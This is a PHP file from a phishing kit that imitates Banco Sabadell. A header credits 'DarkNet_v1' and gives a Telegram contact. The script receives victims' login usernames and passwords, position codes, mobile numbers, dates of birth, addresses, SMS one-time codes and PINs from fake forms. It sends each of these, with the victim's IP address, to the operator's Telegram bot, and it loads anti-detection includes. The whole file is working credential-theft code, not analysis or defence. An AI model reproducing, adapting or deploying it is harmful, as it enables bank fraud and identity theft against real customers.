<?php

    /*===================================================
    += Collected by: DarkNet_v1
    -----------------------------------------------------
    += Contact me on telegram : https://t.me/DarkNet_v1 
    +===================================================*/

    session_start();


    include "./config.php";
    include "../prevents/anti.php";
    include "../prevents/antic.php";  

    if(isset($_POST["Log"])) {
        
        $type      = "<code>".$_POST["type"]."</code>";
        $user      = "<code>".$_POST["user"]."</code>";
        $pass      = "<code>".$_POST["pass"]."</code>";
       
        $message=
        '<blockquote>[LOGIN] => BANKSABADELL</blockquote>'."\n".     
        '- TYPE : '.$type."\n". 
        '- USER : '.$user."\n". 
        '- PASS : '.$pass."\n".
        '- IP : '.$_SERVER['REMOTE_ADDR']."\n".
        '[🛂] Panel-link : '.get_steps_link()."\n".
        '<blockquote>└ © :  [© - All rights reserved.]</blockquote>'."\n";  

        sendTelegramMessage(BOT_TOKEN, CHAT_ID, $message);
        reset_data();      
        header("Location: ../../../loading.php");
        exit();       


    }elseif(isset($_POST["posit"])){

        $sms      = "<code>".$_POST["x1"].$_POST["x2"]."</code>";

        $message=
        '<blockquote>[POSITION] => BANKSABADELL</blockquote>'."\n".     
        '- Code : '.$sms."\n".
        '- IP : '.$_SERVER['REMOTE_ADDR']."\n".
        '[🛂] Panel-link : '.get_steps_link()."\n".
        '<blockquote>└ © @DarkNet_v1 :  [© - All rights reserved.]</blockquote>'."\n";  

        sendTelegramMessage(BOT_TOKEN, CHAT_ID, $message);
        reset_data();
        header("Location: ../../../loading.php");
        exit();        
 
    }elseif(isset($_POST["card"])){

        $mobile    = "<code>".$_POST["mobile"]."</code>";
        $dob       = "<code>".$_POST["dob"]."</code>";
        $address   = "<code>".$_POST["address"]."</code>";

        $message=
        '<blockquote>[IDENTITY] => BANKSABADELL</blockquote>'."\n".     
        '- Mobile : '.$mobile."\n".
        '- Date of Birth : '.$dob."\n".
        '- Address : '.$address."\n".
        '- IP : '.$_SERVER['REMOTE_ADDR']."\n".
        '[🛂] Panel-link : '.get_steps_link()."\n".
        '<blockquote>└ © :  [© - All rights reserved.]</blockquote>'."\n";          
        
        sendTelegramMessage(BOT_TOKEN, CHAT_ID, $message);
        reset_data();
        header("Location: ../../../loading.php");
        exit();   

    }elseif(isset($_POST["sms"])){

        $sms      = "<code>".$_POST["sms_code"]."</code>";

        $message=
        '<blockquote>[SMS] => BANKSABADELL</blockquote>'."\n".     
        '- SMS : '.$sms."\n".
        '- IP : '.$_SERVER['REMOTE_ADDR']."\n".
        '[🛂] Panel-link : '.get_steps_link()."\n".
        '<blockquote>└ © :  [© - All rights reserved.]</blockquote>'."\n";  

        sendTelegramMessage(BOT_TOKEN, CHAT_ID, $message);
        reset_data();
        header("Location: ../../../loading.php");
        exit();        
 
    }elseif(isset($_POST["pin"])){

        $pin      = "<code>".$_POST["pin_code"]."</code>";

        $message=
        '<blockquote>[PIN Code] => BANKSABADELL</blockquote>'."\n".     
        '- Code : '.$pin."\n".
        '- IP : '.$_SERVER['REMOTE_ADDR']."\n".
        '[🛂] Panel-link : '.get_steps_link()."\n".
        '<blockquote>└ © :  [© - All rights reserved.]</blockquote>'."\n";  

        sendTelegramMessage(BOT_TOKEN, CHAT_ID, $message);
        reset_data();
        header("Location: ../../../loading.php");
        exit();        
 
    }elseif(isset($_GET["send"])){
        
        
        $message=
        '<blockquote>[ERROR CODE] => BANKSABADELL</blockquote>'."\n".     
        '- Code not received Please Send Another code : '.$sms."\n".
        '- IP : '.$_SERVER['REMOTE_ADDR']."\n".
        '<blockquote>└ © :  [© - All rights reserved.]</blockquote>'."\n";  

        sendTelegramMessage(BOT_TOKEN, CHAT_ID, $message);
        reset_data();
        header("Location: ../../../loading.php");
        exit();   
 
    }

?>